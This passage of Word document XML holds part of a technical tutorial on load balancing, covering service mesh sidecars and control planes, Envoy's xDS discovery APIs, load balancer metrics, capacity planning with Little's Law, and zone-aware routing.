    <w:p w14:paraId="4777C043" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Circuit breaking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5817AEF8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA037C3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>mTLS between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087FB3F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Observability (metrics, tracing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE7DB2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The application knows nothing about load balancing. It just calls localhost:port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E8FF64" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The control plane (Istio, Linkerd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A5E1E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Configures all Envoy sidecars centrally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1986FB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Pushes routing rules, retry policies, circuit breaker thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5C1C1C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Collects telemetry from all sidecars.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF183E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Enables traffic splitting (canary: 5% to v2, 95% to v1) without application changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541D398" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How traffic flows in a service mesh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F5C96" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FD5B0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Service A → [Sidecar Proxy A] --network--&gt; [Sidecar Proxy B] → Service B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6589B1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Both proxies participate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25603374" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Proxy A: selects backend, opens connection, handles retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2AF32" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Proxy B: enforces rate limits, reports metrics, handles inbound TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A280AFF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.3 xDS API — How the Control Plane Configures Load Balancers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3ABFF6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy's discovery APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E32CB6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDS (Cluster Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> "What backend clusters exist?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633734FB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EDS (Endpoint Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> "What are the current IPs/ports for cluster X?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F86C7B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDS (Route Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> "What routing rules apply?" (path-based routing, header matching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706688B7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LDS (Listener Discovery Service):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> "What ports should I listen on, what filters to apply?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2897D31C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works dynamically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638AB21C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Envoy starts up, connects to the control plane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFCD50" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Control plane streams configuration updates via gRPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D45A8A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>When a new backend instance launches (registers in Kubernetes), the control plane pushes updated EDS to all Envoy instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA2503A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Envoys start routing traffic to the new instance within seconds — no restart, no config file reload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEC90B9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="2B6FEFAC">
          <v:rect id="_x0000_i2682" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78BFE7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Load Balancer Observability — What to Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3566F1B0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Critical Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952AE93" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Frontend (client-facing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04001BBE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Requests per second (throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334EF70" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Active connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D263FE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Connection rate (new connections/sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5252EBFA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Request latency at the LB (time in LB before forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233B474" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>SSL handshake time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249EAFCB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>HTTP error rates by status code (4xx from clients, 5xx from backends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CAB691" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CABEE0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Healthy vs. unhealthy backend count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52098E49" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Connections per backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A46A79" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Response time per backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659589A2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Error rate per backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CDF859" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Queue depth (requests waiting for available backends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBD48C5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Connection pool utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649D909F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LB resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2028D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>CPU utilization (especially with SSL termination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE88615" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Memory (connection tracking tables, buffers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CA992" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Network throughput (bandwidth saturation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B22CFE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>File descriptors (each connection uses one)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74D5ED" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Using Metrics for Capacity Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593FD424" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Little's Law applied to the load balancer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA4A6A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5761D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Max Throughput = Max Concurrent Connections / Average Request Duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0350F375" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If your LB supports 500,000 concurrent connections, and average request takes 100ms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539881F6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBEAC9D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Max Throughput = 500,000 / 0.1 = 5,000,000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0CDD0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>But if average request duration increases to 2s (backend slowdown):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0614890C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA34B9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Max Throughput = 500,000 / 2 = 250,000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A259338" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>A slow backend can choke the LB by holding connections open longer. This is why timeouts are critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8DA867" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="004A68D6">
          <v:rect id="_x0000_i2683" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B826830" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Advanced Load Balancing Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E3BB13" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Locality-Aware Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8CA63C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> In a distributed system across racks/zones/regions, routing to the nearest backend reduces latency and cross-zone network costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D23FF1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works (Envoy's Zone-Aware Routing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EBA2A4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Each backend is tagged with its zone (e.g., us-east-1a, us-east-1b).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB6038" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB (or sidecar) knows its own zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183731D1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Preferentially routes to same-zone backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187EE0DE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Spills over to other zones only when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56855221" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Local zone backends are unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC9FA4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="343"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Local zone is overloaded (above a threshold, e.g., 80% capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207546BF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The balance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Stay local (low latency, lower cost) vs. distribute evenly (avoid overloading local backends).</w:t>
      </w:r>
    </w:p>
